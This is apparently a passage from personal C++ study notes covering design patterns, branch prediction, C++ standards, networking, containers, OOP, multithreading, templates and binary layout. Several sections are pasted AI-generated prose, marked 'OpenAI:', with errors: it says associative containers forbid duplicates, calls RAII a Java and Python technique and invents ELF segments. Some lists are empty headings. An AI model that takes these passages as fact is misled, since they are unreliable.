  12. Composite Pattern: Composes objects into tree structures to represent part-whole hierarchies. It allows clients to treat individual objects and compositions of objects uniformly.

  13. Bridge Pattern: Decouples an abstraction from its implementation so that the two can vary independently. It is often used to separate interface from implementation and to provide the flexibility for both to change without affecting each other.

  14. Flyweight Pattern: Reduces the number of objects created by sharing objects that are similar. It is often used to conserve memory and improve performance.

  15. Chain of Responsibility Pattern: Allows multiple objects to handle a request without specifying the exact handler. It creates a chain of objects that can each handle the request or pass it on to the next object in the chain.

Factory pattern

The factory design pattern is a creational design pattern that provides a way to create objects without specifying the exact class of object that will be created. This pattern encapsulates the object creation process in a separate class, known as the factory, which is responsible for creating objects based on certain criteria or parameters.

The main purpose of the factory design pattern is to promote loose coupling and maintainability by separating the object creation logic from the rest of the code. This allows for easier modification and extension of the code without impacting the client code.

The basic structure of the factory design pattern includes the following components:

  1. Factory Interface/Abstract Class: This is an interface or abstract class that defines the methods for creating objects. It may also contain common logic for object creation.

  2. Concrete Factory: This is a class that implements the factory interface and is responsible for creating specific types of objects based on the client’s request.

  3. Product Interface/Abstract Class: This is an interface or abstract class that defines the common properties and methods of the objects that will be created by the factory.

  4. Concrete Product: This is a class that implements the product interface and defines the specific properties and methods of the object.

  5. Client: This is the class that uses the factory to create objects, without having knowledge of the specific object class being created.

The process of using the factory design pattern involves the following steps:

  1. The client requests an object from the factory by passing the necessary parameters or criteria.

  2. The factory uses the passed parameters to determine which type of object to create.

  3. The factory creates the object and returns it to the client.

Overall, the factory design pattern provides a flexible way of creating objects by encapsulating the object creation process in a separate class. It also promotes code reusability and maintainability by allowing for easy modifications and extensions. It is commonly used in applications where the creation of objects is complex or there is a need for creating multiple types of objects.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a behavioral design pattern in which a single operation is applied to a group of objects without modifying their classes. It allows for the separation of an algorithm from the objects it operates on, providing a way to add new operations without changing the classes of the objects on which the operation is performed.

The pattern consists of three main components: the visitor, the elements, and the client. The visitor is a class that contains the algorithm or operation that is to be performed on the elements. The elements are the objects on which the operation is to be performed. The client is responsible for creating the visitor and passing it to the elements to be visited.

The visitor pattern works by having the elements accept the visitor and call the appropriate method based on their type. The visitor then performs the operation on the element and can access its internal state if needed. This allows for different operations to be performed on different types of elements without modifying their classes.

One of the key benefits of using the visitor pattern is that it allows for the addition of new operations without changing the existing code. This makes it easy to add new features to an application without having to modify the existing codebase. It also promotes code reuse and separation of concerns, as the visitor encapsulates the algorithm and can be reused on different elements.

However, the visitor pattern can also have some downsides. It can make the code more complex and harder to understand, as the logic of the operation is spread across multiple classes. It also requires all elements to implement the visitor interface, which can be cumbersome in some cases.

In summary, the visitor design pattern is a useful tool for separating algorithms from the objects they operate on, allowing for the addition of new operations without modifying existing code. It promotes code reuse and separation of concerns, but can also make the code more complex.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a technique used in subtype polymorphism to enable objects to handle method calls differently based on the types of two objects involved in the call. This is achieved by having the method call first dispatched to the receiving object, and then dispatched again to the argument object, allowing both objects to determine how the call should be handled based on their specific types.

In other words, when a method is called on an object, the object itself determines how to handle the call based on its own type. Then, the method is called again on the argument object, and that object determines how to handle the call based on its own type. This allows for more specific and specialized behavior based on the types of both objects involved in the call.

Double dispatch is a form of dynamic binding, where the specific implementation of a method is determined at runtime based on the types of the objects involved. This allows for greater flexibility and extensibility in object-oriented code, as new subtypes can be added without having to modify existing code.

One common use case for double dispatch is in collision detection in video games. Each game object (such as a player character or an enemy) has its own collision detection method, and when two objects collide, the method is called on both objects. This allows each object to handle the collision differently based on its own type, enabling more realistic and varied interactions between objects in the game.

Overall, double dispatch is a powerful technique that allows for more dynamic and flexible behavior in object-oriented programming, and is a key aspect of subtype polymorphism.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a design principle in software development that suggests that high-level modules or components within a system should not depend on low-level modules or components directly. Instead, both should depend on abstractions or interfaces, which allows for easier maintenance and flexibility in the system. This principle promotes decoupling and helps to reduce the impact of changes to one part of the system on other parts. It is often implemented through the use of inversion of control (IoC) frameworks and design patterns such as the dependency injection pattern.


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

See the complete article.


Branching

Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;
}

Branch prediction

In summary, branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: Branch prediction is a technique used in computer processors to improve the performance of branch instructions, which are instructions that can cause the program to jump to another part of the code. Branch prediction works by predicting the outcome of a branch instruction and starting the processing of the predicted instruction before the actual outcome is known.

There are two types of branch prediction: static and dynamic. Static branch prediction uses a fixed rule to predict the outcome of a branch instruction based on the program’s structure and previous executions. This method is simple and fast but can be inaccurate if the prediction rule does not match the actual outcome.

Dynamic branch prediction, on the other hand, uses past execution history to make predictions. It maintains a table of previous branch instructions and their outcomes, and uses this information to make predictions for future branch instructions. This method is more accurate but requires more resources and can be slower.

The main goal of branch prediction is to reduce the number of stalled cycles in the processor. When a branch instruction is encountered, the processor has to stop and wait for the outcome before it can continue processing, resulting in wasted cycles. By predicting the outcome and starting the processing of the predicted instruction, branch prediction can help reduce the number of stalled cycles and improve the overall performance of the processor.

Branch prediction can also be improved by using more sophisticated algorithms such as neural networks or machine learning techniques to analyze the patterns and make more accurate predictions. Additionally, branch prediction can be combined with other techniques such as speculative execution, where the processor predicts and executes multiple possible outcomes, to further improve performance.

However, branch prediction is not always accurate and can lead to incorrect predictions, resulting in wasted cycles and decreased performance. This is known as a branch misprediction. To mitigate this issue, processors may have mechanisms in place to detect and handle mispredictions, such as flushing the incorrectly predicted instructions and restarting from the correct branch instruction.

Overall, branch prediction is an important technique for improving the performance of modern processors by reducing the impact of branch instructions on the processor’s execution pipeline.

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.

References


Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}

C++ standards

The big things for me are ranges and views, so effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once!

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might be available in 13.2 with -fmodules-fs flag).

Notable mentions from C++17 are structured bindings and execution policy.

C++26

C++23

See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Description Protocols
Application Provides network services to applications HTTP, FTP, SMTP
Presentation Formats data for presentation to the Application layer JPEG, ASCII, MPEG
Session Manages communication sessions between devices NetBIOS, RPC
Transport Ensures reliable communication between devices TCP, UDP
Network Routes data between devices on different networks IP, ICMP, OSPF
Data Link Manages data transmission between devices on the same network Ethernet, Wi-Fi, PPP
Physical Transmits raw data between devices Ethernet cables, fiber optics

Three way handshake

The TCP three way handshake is a method used to establish a connection between two devices using the Transmission Control Protocol (TCP). It is a three-step process that allows devices to synchronize and establish a reliable connection before data transmission can begin. The steps involved in the TCP three way handshake are as follows:

Step 1: SYN (Synchronize) The first step in the TCP three way handshake is the SYN packet. The client device sends a SYN packet to the server with a randomly generated sequence number. This packet indicates the client’s intention to establish a connection with the server.

Step 2: SYN-ACK (Synchronize-Acknowledge) Upon receiving the SYN packet, the server responds with a SYN-ACK packet. This packet contains an acknowledgment of the client’s sequence number and a randomly generated sequence number of its own. It also confirms the server’s readiness to establish a connection.

Step 3: ACK (Acknowledgment) In the final step, the client sends an ACK packet to the server, which acknowledges the server’s sequence number. This packet also confirms the client’s readiness to start data transmission. At this point, a TCP connection is established between the two devices, and data transmission can begin.

Overall, the TCP three way handshake ensures that both devices are ready to communicate and that they agree on the initial sequence numbers. It also helps to prevent data loss and ensure reliable data transmission between the two devices.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

The C++ Standard Library containers

  1. Efficient Memory Management: The Standard Library containers are designed to manage memory efficiently, which means they use less memory and have better performance compared to user-defined containers.

  2. Standardized Interface: All the containers in the Standard Library are standardized, which means they have a common set of member functions and behaviors. This makes it easy to learn and use different containers without having to learn new syntax and semantics.

  3. Wide Range of Containers: The Standard Library provides a wide range of containers such as vector, list, map, set, etc., each designed for a specific purpose. This allows developers to choose the appropriate container for their needs without having to reinvent the wheel.

  4. High-Quality Implementation: The containers in the Standard Library are thoroughly tested and optimized by experts, making them highly reliable and robust. This ensures that the containers perform efficiently and are free from bugs.

  5. Compatibility: The Standard Library containers are compatible with different compilers and platforms, making it easy to write portable code. This means that the same code can be used on different systems without any modifications.

  6. Extensibility: The Standard Library containers are designed to be easily extensible, allowing developers to add their own customizations and functionalities to the containers if needed.

  7. Comprehensive Algorithms: The Standard Library also provides a wide range of algorithms that can be used with the containers. These algorithms are optimized for the containers and provide efficient solutions to common problems.

  8. Community Support: The Standard Library containers are widely used by developers, which means there is a large community of users who can provide support and share their knowledge and experience.

  9. Time-Saving: Using the Standard Library containers saves time and effort as developers do not have to write their own containers from scratch. This allows them to focus on the logic and functionality of their code rather than implementing basic data structures.

  10. Standardization: As the name suggests, the Standard Library containers are part of the C++ Standard, which means they are widely accepted and recognized as a standard way of implementing containers in C++. This ensures consistency and compatibility among different codebases and libraries.

  11. Vector

  12. List

  13. Deque

  14. Array

  15. Set

  16. Multiset

  17. Map

  18. Multimap

  19. Unordered_set

  20. Unordered_multiset

  21. Unordered_map

  22. Unordered_multimap

  23. Stack

  24. Queue

  25. Priority_queue

  26. Bitset

  27. Forward_list

  28. Span

  29. Valarray

  30. String

  31. Wstring

  32. U16string

  33. U32string

  34. String_view

Categories of containers

Sequence and associative containers are two types of containers used in programming to store and organize data. They have some similarities, but also some distinct differences that make them useful for different purposes.

Sequence containers, also known as linear containers, store elements in a specific order and allow for sequential access to these elements. This means that the elements are stored in a linear structure, such as a vector, list, or deque, and can be accessed one after the other. The elements in a sequence container are typically accessed using an index or iterator, and the order of elements remains fixed unless explicitly changed by the programmer. This makes sequence containers useful for tasks such as sorting, searching, and manipulating data in a specific order.

On the other hand, associative containers store elements in a data structure that allows for efficient retrieval based on a key value. This means that instead of accessing elements by their position in the container, they are accessed by a specified key value. Examples of associative containers include maps, sets, and hash tables. These containers are useful for tasks that involve quickly retrieving specific elements based on their key value, rather than searching through the entire container.

One key difference between sequence and associative containers is the way they store elements. Sequence containers typically use dynamic arrays, linked lists, or double-ended queues to store data, while associative containers use data structures like binary search trees, hash tables, or red-black trees. This difference in storage method also affects the performance of operations on these containers. For example, sequence containers have efficient insertion and deletion operations at the beginning or end of the container, while associative containers have efficient retrieval operations based on key values.

Another difference between sequence and associative containers is the way they handle duplicate elements. In sequence containers, duplicate elements can be stored multiple times, while in associative containers, duplicate elements are not allowed. This is because the key value must be unique in associative containers to efficiently retrieve elements.

In summary, sequence containers are ideal for storing and accessing elements in a specific order, while associative containers are better suited for quickly retrieving elements based on a key value. The choice between these two types of containers depends on the specific needs of the program and the type of data being stored.

Choosing a container


The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that focuses on creating and organizing code into objects that have properties and behaviors. These objects can interact with each other to perform tasks and solve problems. OOP is based on the concept of real-world objects, allowing for a more intuitive and organized approach to programming.

The main principles of OOP are encapsulation, abstraction, inheritance, and polymorphism. Encapsulation refers to the ability to hide the implementation details of an object and only expose the necessary information. Abstraction allows for the creation of simplified models of complex systems, making it easier to manage and understand. Inheritance allows objects to inherit properties and behaviors from a parent object, promoting code reuse and reducing redundancy. Polymorphism allows objects to have different forms or behaviors depending on the context in which they are used.

One of the key benefits of OOP is modularity, as objects can be created and modified independently, making it easier to maintain and update code. OOP also promotes code reusability, as objects can be reused in different parts of a program or in different programs altogether.

Some popular programming languages that use OOP include Java, C++, and Python. OOP is widely used in software development and is considered a powerful and efficient approach to programming complex systems.

Polymorphism

  1. Ad-hoc Polymorphism: This type of polymorphism is also known as function overloading or operator overloading. It allows different functions or operators to have the same name but different implementations based on the types of the input parameters. This is achieved by using function or operator overloading.

  2. Parametric Polymorphism: This type of polymorphism is also known as generic programming. It allows functions or types to be written in a way that can handle different data types without specifying them beforehand. This is achieved by using templates in C++ or generics in Java.

  3. Subtype Polymorphism: This type of polymorphism is also known as inheritance or subtype substitution. It allows a subclass to be treated as its superclass, thereby inheriting all its properties and methods. This allows for code reusability and flexibility in object-oriented programming.

  4. Inclusion Polymorphism: This type of polymorphism is also known as interface polymorphism. It allows different objects to be treated in a similar way based on their common interface or shared behavior. This is achieved by implementing interfaces in Java or using virtual functions in C++.

  5. Coercion Polymorphism: This type of polymorphism involves implicit type conversions between different data types. This can happen during operations between different data types, such as converting an integer to a float when performing a division operation.

  6. Overriding Polymorphism: This type of polymorphism allows a subclass to override a method or property of its superclass with its own implementation. This allows for customization and specialization of behavior in subclasses.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.

RAII

RAII stands for Resource Acquisition Is Initialization and is a programming technique used in languages like C++, Java, and Python to manage resources and ensure proper resource allocation and deallocation. It is a concept that ties the lifetime of a resource to the lifetime of an object, ensuring that the resource is acquired when the object is created and released when the object is destroyed.

The main idea behind RAII is to use objects to manage resources such as memory, files, database connections, or any other limited and shared resource. The object acquires the resource in its constructor and releases it in its destructor, thus ensuring that the resource is always properly managed, even in the case of exceptions or unexpected program termination.

RAII is based on the principle of encapsulation, where the resource is tied to the object and can only be accessed through it. This ensures that the resource is not accidentally released or accessed by other parts of the code, preventing potential bugs and memory leaks.

RAII also allows for efficient resource management, as the resource is acquired and released automatically without the need for explicit calls from the programmer. This reduces the risk of forgetting to release a resource and improves code readability and maintainability.

In summary, RAII is a powerful concept that helps manage resources in a safe, efficient, and reliable way, making it an essential technique in modern programming languages.


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted without an not leave the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants are conditions or properties that remain unchanged throughout a process or system. They are characteristics that are maintained at all times, regardless of any external factors or changes. In other words, invariants are rules or principles that are always true and cannot be altered.

In computer science and mathematics, invariants are commonly used to describe properties of algorithms, data structures, or mathematical equations. They can be used to prove the correctness of a program or to analyze the behavior of a system.

Invariants are important because they help ensure the reliability and consistency of a process or system. They act as checkpoints that must be satisfied at all times, and any deviation from an invariant indicates an error or a flaw in the system.

There are different types of invariants, such as loop invariants, which are properties that hold true before and after each iteration of a loop, and class invariants, which are properties that must be maintained by all instances of a class. Invariants can also be temporal, meaning they hold true at a specific point in time, or spatial, meaning they hold true in a specific location or region.

Invariants are closely related to the concept of inductive reasoning, which involves making generalizations based on specific observations. Invariants can be used as the basis for inductive reasoning, as they provide a foundation of truths that can be used to make logical conclusions.

Overall, invariants play a crucial role in ensuring the stability and correctness of processes and systems, and they are an important tool in the fields of computer science, mathematics, and engineering.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome of a program or process depends on the timing or order of events rather than the logical flow of instructions. This can lead to unexpected or incorrect results and can be difficult to predict or debug.

One common type of race condition is a data race, where multiple threads or processes are accessing and modifying the same shared data without proper synchronization. This can result in inconsistent or corrupted data if the operations are not coordinated properly.

Another type is a timing race, where the outcome of a program depends on the precise timing of events, such as user input or network communication. If these events do not occur in the expected order or within a certain timeframe, the program may behave unexpectedly.

Race conditions can also occur in distributed systems, where multiple machines are communicating and coordinating with each other. In this case, network delays or failures can lead to inconsistent or conflicting data.

Race conditions are particularly problematic in parallel and concurrent programming, where multiple threads or processes are running simultaneously and can interfere with each other’s operations. They can also occur in single-threaded programs if there are unexpected interrupts or asynchronous events.

Overall, race conditions can be difficult to detect and debug, as they may only occur under specific circumstances and can be hard to reproduce. Proper synchronization and careful design are necessary to avoid race conditions in computer programs.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.

OpenAI: Deadlocks and livelocks are both types of concurrency issues that occur in computer systems. However, they differ in their causes and effects.

  1. Definition
  1. Cause
  1. Effect
  1. Handling
  1. Recovery
  1. Frequency

In summary, deadlocks and livelocks are both concurrency issues that can cause system instability and unresponsiveness. While deadlocks are caused by a circular dependency of resources, livelocks are caused by a communication or synchronization issue between processes. Both can be resolved and recovered from, but livelocks are more common and can be more difficult to detect and handle.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI: 1. Use a timeout: Set a timeout for each transaction so that if it takes too long, it will automatically abort. This will prevent transactions from waiting indefinitely and potentially causing a deadlock.

  1. Avoid long-running transactions: Long-running transactions increase the chances of a deadlock occurring. Try to break down large transactions into smaller ones to reduce their duration.

  2. Use the correct isolation level: Make sure to use the appropriate isolation level for your transactions. For example, using the READ COMMITTED isolation level can prevent dirty reads and reduce the chances of a deadlock occurring.

  3. Access resources in a consistent order: To prevent circular dependencies, make sure all transactions access resources in the same order. This will prevent one transaction from blocking another.

  4. Keep transactions short and simple: The longer and more complex a transaction is, the more likely it is to cause a deadlock. Try to keep transactions short and simple to minimize the chances of a deadlock occurring.

  5. Use indexes: Use indexes on tables to improve query performance and reduce the time a transaction holds a lock on a resource. This will decrease the chances of another transaction waiting for the same resource and causing a deadlock.

  6. Avoid holding locks unnecessarily: Only hold a lock for the minimum amount of time necessary. This will reduce the chances of a deadlock occurring and improve overall system performance.

  7. Monitor and troubleshoot: Use tools to monitor your database for deadlocks and troubleshoot any issues that arise. This will help you identify and fix the root cause of the deadlock.

  8. Use a queuing mechanism: Implement a queuing mechanism to handle concurrent requests for the same resource. This will ensure that only one transaction can access the resource at a time, preventing deadlocks from occurring.

  9. Properly handle errors: Make sure to handle errors in your code properly. This includes catching and handling database errors and retrying transactions if necessary. Proper error handling can prevent unexpected failures and reduce the chances of a deadlock occurring.

See also

Additionally

Synchronising threads

OpenAI: Mutex and semaphore are both synchronization mechanisms used in multithreaded programming to prevent race conditions and ensure thread safety. They both provide a way for threads to access shared resources without interfering with each other. However, they have some key differences in terms of their functionality and usage.

  1. Purpose: Mutex (short for mutual exclusion) is used to ensure that only one thread can access a shared resource at a time. It provides a lock that threads must acquire before accessing the resource, and release after they are done. This ensures that the resource is not accessed by multiple threads simultaneously, preventing data corruption.

Semaphore, on the other hand, is used to control access to a shared resource that has a limited capacity. It maintains a count of the number of threads that can access the resource at a given time. Once the count reaches zero, the semaphore will block any further attempts to access the resource until it is released by another thread.

  1. Types: Mutex is a binary synchronization mechanism, meaning it has only two states - locked and unlocked. It is typically used to protect critical sections of code where only one thread should be allowed to execute at a time.

Semaphore, on the other hand, can be either binary or counting. A binary semaphore has two states - locked and unlocked, similar to a mutex. However, a counting semaphore can have a value greater than one, indicating the number of threads that can access the shared resource simultaneously.

  1. Usage: Mutex is commonly used to protect access to shared variables, data structures, and critical sections of code. It is also used in synchronization primitives such as monitors and condition variables.

Semaphore is often used to control access to resources with a limited capacity, such as a shared pool of database connections, or a fixed number of threads that can access a resource at a time.

  1. Implementation: Mutex is typically implemented using a lock or a flag that is set when a thread acquires the lock and released when the thread releases it. This ensures that only one thread can acquire the lock at a time, and other threads will have to wait until the lock is released.

Semaphore is implemented using a counter that tracks the number of available resources. When a thread wants to access the resource, it decrements the counter, and when it is done, it increments the counter. If the counter reaches zero, the semaphore will block any further attempts to access the resource until it is signaled by another thread.

In summary, mutex and semaphore are both synchronization mechanisms used to coordinate access to shared resources in multithreaded environments. Mutex is used when only one thread should access the resource at a time, while semaphore is used to control access to a resource with a limited capacity.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both units of execution within a computer system, but they have some key differences. Here’s a breakdown of how they compare:

  1. Definition:
  1. Creation:
  1. Resource sharing:
  1. Communication:
  1. Overhead:
  1. Context switching:
  1. Parallelism:
  1. Concurrency:

In summary, threads and processes have different characteristics and are used for different purposes. Threads are more lightweight and efficient for tasks that require parallelism and resource sharing, while processes provide better isolation and security for independent tasks.

Thread bests practice

References


Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a programming technique used to perform computations and manipulate data at compile time rather than at run time. It is based on the use of templates, which are code patterns that can be customized with different data types and values. This allows for the creation of generic code that can be reused for different scenarios, increasing code efficiency and reducing the need for manual coding.

In template metaprogramming, templates are used to define types and functions that can be evaluated and executed by the compiler, producing code specific to the given template parameters. This allows for the creation of code that can perform complex operations and calculations at compile time, resulting in faster and more efficient code.

One of the key features of template metaprogramming is the ability to perform type deduction and type traits, which allow the compiler to determine the properties and behaviors of a given type. This enables the creation of code that is highly adaptable and can handle different data types without the need for explicit type declarations.

Another important aspect of template metaprogramming is the use of template specialization, which allows for the creation of specialized versions of a template for specific data types or scenarios. This can be used to optimize code for certain situations or to handle edge cases that may not be covered by the generic template.

Template metaprogramming is commonly used in modern C++ programming, where it is used to implement powerful libraries and frameworks such as the Standard Template Library (STL) and Boost. It can also be used to create efficient and flexible data structures, algorithms, and other complex systems.

Overall, template metaprogramming is a powerful technique for creating efficient and reusable code that can be customized for different scenarios. Its use can result in faster and more optimized programs, making it an important tool for modern software development.

Templates in the C++ Standard Library allow for generic programming, meaning that the same code can be used with different data types. This is achieved by writing code that is independent of specific data types, but instead uses template parameters to represent them.

The most common use of templates in the C++ Standard Library is in containers, such as vector, list, and map. These containers are able to hold any data type because they are implemented using templates. For example, a vector can hold integers, strings, or even user-defined objects, without needing to write separate code for each data type.

Templates are also used in algorithms, which are functions that operate on containers. These algorithms are written in a generic way, so they can be used with any container that supports the necessary operations. This allows for efficient and flexible programming, as the same algorithm can be used with different containers.

Another use of templates in the C++ Standard Library is in smart pointers, such as unique_ptr and shared_ptr. These allow for automatic memory management, and their templates allow them to be used with different data types.

In addition, templates are used in other parts of the Standard Library, such as the tuple class, regular expressions, and I/O streams. They provide a powerful and flexible way to write code that is reusable and adaptable to different data types.

Overall, templates in the C++ Standard Library are essential for generic programming, enabling the creation of versatile and efficient code that can be used with a wide variety of data types. They are a key feature of the language that make it popular for both low-level system programming and high-level application development.

SFINAE

SFINAE (Substitution Failure Is Not An Error) is a concept in C++ that allows the compiler to bypass template errors and continue compiling the code, instead of throwing an error. This is achieved by using template specialization and overloading.

SFINAE allows the compiler to choose the best-matched template based on the available template parameters. If the compiler is unable to substitute the template parameters, it will simply ignore the error and move on to the next available template. This allows for more flexibility and customization in template-based programming.

An example of SFINAE is when using the "enable_if" template, which allows the compiler to select a specific template based on a condition. If the condition is not met, the compiler will simply move on to the next available template, instead of throwing an error.

SFINAE is commonly used in advanced C++ programming, particularly in template metaprogramming, to enable more complex type checking and customization. It helps to make templates more flexible and robust, as well as improving compile-time efficiency.


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Header: The header segment contains information about the binary, such as the program’s entry point, the location and size of other segments, and other metadata.

  2. Code segment: Also known as the text segment, this contains the instructions that make up the program’s executable code. These instructions are typically in machine code or assembly language.

  3. Data segment: This segment contains initialized global and static variables used by the program. It is typically divided into two sub-segments: the read-only data segment and the read-write data segment.

  4. BSS segment: Standing for "Block Started by Symbol", the BSS segment contains uninitialized global and static variables. This segment is usually located after the data segment in memory.

  5. Stack segment: This segment is used for storing local variables and function parameters during the execution of the program. It is a last-in-first-out (LIFO) data structure, meaning that the most recently added data is the first to be removed.

  6. Heap segment: The heap segment is used for dynamic memory allocation during the program’s execution. It is a region of memory that can be dynamically expanded or shrunk as needed.

  7. Libraries segment: This segment contains code and data from external libraries that are linked to the program. These libraries may include functions and resources that the program needs to run.

  8. Symbols table: This segment contains a list of symbols used in the program, such as function names, global variables, and constants. It is used by the linker to resolve references to these symbols from different segments.

  9. Relocation table: The relocation table contains information about the location of code and data segments, as well as the addresses of external symbols. This information is used by the linker to adjust memory addresses during the linking process.

  10. Debugging information: This segment contains data used for debugging the program, such as line numbers, variable names, and other metadata. It is typically only included in development versions of the program.


Algorithms

The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

